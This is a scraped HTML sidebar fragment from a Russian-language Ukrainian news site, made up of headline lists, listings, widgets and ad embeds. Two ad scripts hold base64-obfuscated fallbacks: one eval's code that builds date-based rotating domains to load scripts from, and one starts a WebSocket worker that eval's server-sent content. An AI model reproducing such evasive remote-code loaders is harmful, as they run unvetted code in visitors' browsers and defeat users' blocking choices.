class="view"><span><i></i>3371</span></td><td class="view"><span><i></i>1671</span></td><td class="view last"><span><i></i>1085</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/zdorove/full/2311-pora-bit-trevogu-onkolog-nazval-opasnyj-simptom-strashnoj-bolezni" rel="bookmark">Пора бить тревогу: Онколог назвал опасный симптом страшной болезни</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/zdorove/full/711-opredeleno-zabolevanie-provociruyushhee-rak" rel="bookmark">Определено заболевание, провоцирующее рак</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/zdorove/full/311-kitajskie-uchenye-opredelili-kakie-ovoshhi-snizhayut-risk-vozniknoveniya-raka-zheludka" rel="bookmark">Китайские ученые определили, какие овощи снижают риск возникновения рака желудка</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/zdorove/full/1510-amerikanskie-uchenye-sozdali-absolyutno-novyj-metod-borby-s-rakom" rel="bookmark">Американские ученые создали абсолютно новый метод борьбы с раком</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/zdorove/full/810-mediki-perechislili-vazhnye-simptomy-raka-u-muzhchin" rel="bookmark">Медики перечислили важные симптомы рака у мужчин</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/zdorove/full/310-nazvali-prichinu-smertelnogo-raka-krovi" rel="bookmark">Назвали причину смертельного рака крови</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/zdorove/full/210-eksperty-rasskazali-kak-mozhno-spravitsya-s-povyshennym-davleniem-bez-lekarstv" rel="bookmark">Эксперты рассказали, как можно справиться с повышенным давлением без лекарств</a><br /></td> </tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script><br><script>jQuery(document).ready(function($){function region(){html = $('#lastafishasingle .anythingWindow .activePage .region').html();$('#lastafishasingle .head span').html(html);}$('#sliderafishasingle').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><style>#sliderafishasingle .tact li{float:left;width:220px;line-height:8px}#lastafishasingle div.anythingSlider-minimalist-round{margin:auto}#lastafishasingle .postafisha{width:224px}#lastafishasingle h2{text-align:left;padding:10px 32px 10px 35px}#lastafishasingle .title a{display:block;font-size:13px;font-weight:700;text-align:left}#lastafishasingle{margin-bottom:10px;padding:0}#lastafishasingle .title{padding:5px 35px 5px 25px}#lastafishasingle.slide div.anythingSlider-minimalist-round .back,#lastafishasingle.slide div.anythingSlider-minimalist-round .forward{width:40px;height:132px;opacity:1;background-color:transparent}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("img/slider-arrows1.png") no-repeat;width:20px;height:45px;margin-top:54px;margin-left:10px}#lastafishasingle{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha5.png") repeat;border:1px solid #daa36b;-moz-background-size:100%; -webkit-background-size:100%; -o-background-size:100%; background-size:100%}#lastafishasingle .anythingSlider{border-bottom:1px solid #a99168}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha_arrows3.png") no-repeat}#lastafishasingle.slide div.anythingSlider-minimalist-round .forward a{background-position:right 0;margin-left:18px}#lastafishasingle .allafisha{display:block;text-align:right;font-size:14px;font-weight:bold;margin:0;padding:6px 10px 6px}#lastafishasingle .postafisha{position:relative}#lastafishasingle h2 span{float:right;font-size:11px;line-height:18px}#lastafishasingle .region{font-size:13px;text-align:left;padding:0 25px 5px}#lastafishasingle.slide.ssingle h2{padding:10px 17px 3px 40px;font-size:17px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .back,#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward{width:27px;right:-5px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .arrow a{margin-left:0px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward a{margin-left:7px}#lastafishasingle.slide.ssingle .postafisha{width:220px;text-align:right}#lastafishasingle.slide.ssingle .postafisha .aimg{text-align:center;overflow:visible}#lastafishasingle.slide.ssingle .postafisha .aimg img{overflow:visible;box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-moz-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-webkit-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-ms-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-o-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-khtml-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5)}</style><div id="lastafishasingle" class="slide ssingle"><p class="head">Афиша</p><ul id="sliderafishasingle"><li><ul class="tact"><li><ul class="tact"><li ><div id="post-4782495" class="postafisha"><span class="region">Киев 28&#160;ноября</span><div class="aimg"><a href="https://enovosty.com/kino/full/1811-kinopremera-film-obratnyj-otschet"><img width="170" height="132" alt="Кинопремьера: фильм «Обратный отсчет»" src="/wp-content/uploads/2019/11/valhala.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1811-kinopremera-film-obratnyj-otschet">Кинопремьера: фильм «Обратный отсчет»</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4782501" class="postafisha"><span class="region">Киев 28&#160;ноября</span><div class="aimg"><a href="https://enovosty.com/kino/full/1811-kinopremera-film-abbatstvo-daunton"><img width="170" height="132" alt="Кинопремьера: фильм «Аббатство Даунтон» ..." src="/wp-content/uploads/2019/11/abbatstvo.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1811-kinopremera-film-abbatstvo-daunton">Кинопремьера: фильм «Аббатство Даунтон» ...</a></div></div></li></ul></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4396493"><a href="https://enovosty.com/armiya/full/748-samohodnaya-artillerijskaya-ustanovka-155-mm-donar-germaniya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/10/donar-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/10/donar-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/10/donar-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/10/donar.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/748-samohodnaya-artillerijskaya-ustanovka-155-mm-donar-germaniya" >Самоходная артиллерийская установка 155-мм DONAR (Германия)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4402253"><a href="https://enovosty.com/armiya/full/516-vertolet-eurocopter-as-555-fennec-franciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/11/as_555-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/11/as_555-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/11/as_555-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/11/as_555.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/516-vertolet-eurocopter-as-555-fennec-franciya" >Вертолет Eurocopter AS 555 Fennec (Франция)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4414919"><a href="https://enovosty.com/armiya/full/725-vertolet-eurocopter-as565-panther-franciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/12/Eurocopter_AS565_Panther-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/12/Eurocopter_AS565_Panther-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/12/Eurocopter_AS565_Panther-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/12/Eurocopter_AS565_Panther.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/725-vertolet-eurocopter-as565-panther-franciya" >Вертолет Eurocopter AS565 Panther (Франция)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4458178"><a href="https://enovosty.com/armiya/full/483-samolet-kawasaki-c-2-yaponiya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/07/Kawasaki_C-2-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/07/Kawasaki_C-2-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/07/Kawasaki_C-2-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/07/Kawasaki_C-2.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/483-samolet-kawasaki-c-2-yaponiya" >Самолет Kawasaki C-2 (Япония)</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Здоровье</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '31397', 31397, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '31397', 31397, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '31397', 31397, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/zdorove/full/2311-pora-bit-trevogu-onkolog-nazval-opasnyj-simptom-strashnoj-bolezni">Пора бить тревогу: Онколог назвал опасный симптом страшной болезни (1545)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2411-desyat-produktov-sposobnyx-zamenit-lekarstva">Десять продуктов, способных заменить лекарства (1121)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2311-uchenye-rassekretili-mexanizm-formirovaniya-leni">Ученые рассекретили механизм формирования лени (930)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2011-top-5-produktov-zamedlyayushhix-starenie">ТОП-5 продуктов замедляющих старение (834)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2411-uchyonye-nazvali-prichinu-prezhdevremennogo-stareniya-mozga">Учёные назвали причину преждевременного старения мозга (813)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2511-polchishha-klopov-atakuyut-mir-shokiruyushhaya-statistika">Полчища клопов атакуют мир: шокирующая статистика (637)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2311-kak-bystro-i-bez-problem-ubrat-temnye-krugi-pod-glazami">Как быстро и без проблем убрать темные круги под глазами (532)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2011-aviaperelety-mogut-predstavlyat-opasnost-dlya-zdorovya-kak-sebya-zashhitit">Авиаперелеты могут представлять опасность для здоровья: как себя защитить (516)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2511-uchyonye-obnaruzhili-opasnost-soevyx-produktov-kolichestvo-fitoestrogenov-prevyshaet-normu">Учёные обнаружили опасность соевых продуктов: количество фитоэстрогенов превышает норму (358)</a></h3><h3 class="press"><a href="https://enovosty.com/zdorove/full/2311-dietolog-podelilas-vazhnymi-sekretami-kak-poxudet-k-novomu-godu">Диетолог поделилась важными секретами, как похудеть к Новому году (333)</a></h3></div> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4309280"><a href="https://enovosty.com/person/full/simonenko-petr" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/08/simonenko_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/08/simonenko_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/08/simonenko_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/simonenko-petr" >Петр<br /> СИМОНЕНКО</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4421794"><a href="https://enovosty.com/person/full/331-onishhenko-anna" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/01/onishenko-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/01/onishenko-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/01/onishenko.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/331-onishhenko-anna" >Анна<br /> ОНИЩЕНКО</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4475259"><a href="https://enovosty.com/person/full/553-dumchev-sergej" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/10/dumchev-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/10/dumchev-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/10/dumchev.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/553-dumchev-sergej" >Сергей<br /> ДУМЧЕВ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4668018"><a href="https://enovosty.com/person/full/1901-evgenij-gusarov-souchreditel-kompanii-profi" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2018/01/fggffgfgdgf-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/01/fggffgfgdgf-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2018/01/fggffgfgdgf.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/1901-evgenij-gusarov-souchreditel-kompanii-profi" >Евгений<br /> ГУСАРОВ</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_kiev/full/2611-rezinovyj-kiev-gosstat-nazval-kolichestvo-prozhivayushhix-v-stolice-lyudej">"Резиновый" Киев: Госстат назвал количество проживающих в столице людей (4957)</a></p><p class="press"><a href="https://enovosty.com/news_economy/full/2611-evroblyaxerov-nachali-shtrafovat-po-polnoj">Евробляхеров начали штрафовать по-полной (4915)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/2611-ukraincam-napomnili-o-deklarirovanii-avtomobilya-chto-neobxodimo-znat">Украинцам напомнили о декларировании автомобиля: что необходимо знать (3788)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/2611-v-ukrainu-postupaet-vse-bolshe-b-u-avtomobilej-no-vopros-s-evroblyaxami-do-six-por-ne-reshen">В Украину поступает все больше б/у автомобилей, но вопрос с "евробляхами" до сих пор не решен (3226)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/2611-polsha-vernula-iz-anglii-100-tonn-zolota">Польша вернула из Англии 100 тонн золота (2872)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/2611-ukrainskim-voditelyam-napomnili-o-shtrafax-za-kolesa-kak-ne-popast-na-dengi">Украинским водителям напомнили о штрафах за колеса: как не попасть на деньги (2052)</a></p><p class="press"><a href="https://enovosty.com/news_economy/full/2611-uzhe-skoro-ofshory-mogut-polnostyu-ischeznut">Уже скоро офшоры могут полностью исчезнуть (1507)</a></p><p class="press"><a href="https://enovosty.com/news_incidents/full/2611-detektivy-nabu-provodyat-obysk-v-dome-zamestitelya-nachalnika-kievskoj-tamozhni">Детективы НАБУ проводят обыск в доме заместителя начальника Киевской таможни (1452)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/2611-voditelyu-na-zametku-chto-delat-esli-istek-srok-dvuxletnego-voditelskogo-udostovereniya">Водителю на заметку: что делать, если истек срок двухлетнего водительского удостоверения (1408)</a></p><p class="press"><a href="https://enovosty.com/politika/full/2511-itogi-dnya-i-istiraya-cel-krymskogo-mosta">Итоги дня: Смена настроений в Украине, удар по Пекину и истинная цель Крымского моста (1092)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div id="adriver_banner_C1"></div><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://plus.google.com/104224979035578149686" rel="nofollow" target="_blank" class="gplus"><i></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/2810-investiciyam-zdes-ne-mesto">Инвестициям здесь не место</a></p><p class="press"><a href="https://enovosty.com/publications/full/1609-sergej-kaftya-segodnya-v-akvarelyax-komfortnee-zhit-chem-v-bolshinstve-zhk-kieva">Сергей Кафтя: «Сегодня в «Акварелях» комфортнее жить, чем в большинстве ЖК Киева»</a></p></div><div id='admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'></div><script type="text/javascript">admixerML.fn.push(function () { admixerML.display('admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'); });</script><div id="adriver_banner_C3"></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/1811-majdan-v-gonkonge-putinskim-rabam-ne-ponyat"><img alt="Майдан в Гонконге путинским рабам не понять" src="https://enovosty.com/wp-content/uploads/2019/11/butusov-300x218-112x81.jpg"><div></div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/1811-majdan-v-gonkonge-putinskim-rabam-ne-ponyat">Майдан в Гонконге путинским рабам не понять</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/1811-majdan-v-gonkonge-putinskim-rabam-ne-ponyat">Российская пропаганда и ее агентура в Украине много лет поносит Майдан, вдалбливает, что свобода ничего не стоит, что за права человека не стоит драться, ...</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_abroad/full/2211-passazhiry-kruiznogo-lajnera-zastavili-kapitana-sudna-izmenit-kurs-chto-iz-etogo-vyshlo">Пассажиры круизного лайнера заставили капитана судна изменить курс: что из этого вышло (9697)</a></p><p class="press"><a href="https://enovosty.com/mir-video/full/2111-kitajskij-zoopark-pokazal-neobychnuyu-obezyanu-s-chelovecheskim-licom-video">Китайский зоопарк показал необычную обезьяну с человеческим лицом (ВИДЕО) (8019)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2011-prishla-predupredit-nas-o-budushhem-v-arxivax-nashli-foto-grety-tunberg-1898-goda">Пришла предупредить нас о будущем: в архивах нашли фото Греты Тунберг 1898 года (7800)</a></p></div></div></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div><a href="https://enovosty.com/politika/full/2211-kak-i-zachem-ze-vlast-namerena-dushit-svobodu-slova"><img alt="Свобода слова" src="https://enovosty.com/wp-content/themes/eizvestia/img/Ze6.gif"></a></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
